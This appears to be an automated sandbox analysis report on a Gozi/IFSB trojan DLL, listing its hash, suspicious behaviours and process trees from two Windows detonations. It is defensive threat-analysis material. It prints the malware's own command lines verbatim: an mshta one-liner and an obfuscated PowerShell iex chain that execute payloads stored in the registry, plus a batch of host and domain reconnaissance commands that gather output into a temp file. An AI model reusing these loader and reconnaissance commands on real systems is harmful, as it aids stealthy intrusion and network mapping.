Analysis Overview
SHA256
e192656ce9c73ac7bcb4cec136378c5843e128b76cd1c021aeec274edecbf869
Threat Level: Known bad
The file 62f24e6f4c4c7.dll was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Runs net.exe
Discovers systems in the same network
Gathers system information
Enumerates processes with tasklist
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-09 12:13
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-09 12:13
Reported
2022-08-09 12:16
Platform
win7-20220718-en
Max time kernel
42s
Max time network
45s
Command Line
Signatures
Gozi, Gozi IFSB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 484 wrote to memory of 1948 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 484 wrote to memory of 1948 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 484 wrote to memory of 1948 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 484 wrote to memory of 1948 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 484 wrote to memory of 1948 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 484 wrote to memory of 1948 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 484 wrote to memory of 1948 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62f24e6f4c4c7.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\62f24e6f4c4c7.dll
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-09 12:13
Reported
2022-08-09 12:16
Platform
win10v2004-20220721-en
Max time kernel
150s
Max time network
148s
Command Line
Signatures
Gozi, Gozi IFSB
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1780 set thread context of 60 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 60 set thread context of 3524 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 60 set thread context of 3812 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 60 set thread context of 1768 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 60 set thread context of 4156 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 60 set thread context of 5020 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62f24e6f4c4c7.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\62f24e6f4c4c7.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>U9kv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(U9kv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nxgbcyqq -value gp; new-alias -name bvmykoaq -value iex; bvmykoaq ([System.Text.Encoding]::ASCII.GetString((nxgbcyqq "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\luglk0su\luglk0su.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79F3.tmp" "c:\Users\Admin\AppData\Local\Temp\luglk0su\CSC66E30DDD74564D7FAD61A68677EC175F.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\voooxh2f\voooxh2f.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B98.tmp" "c:\Users\Admin\AppData\Local\Temp\voooxh2f\CSCE59AACFE665E40B3A6BCCA3A5DC5B0CC.TMP"
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\net.exe
net view /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\AF85.bin1 > C:\Users\Admin\AppData\Local\Temp\AF85.bin & del C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
Network
Files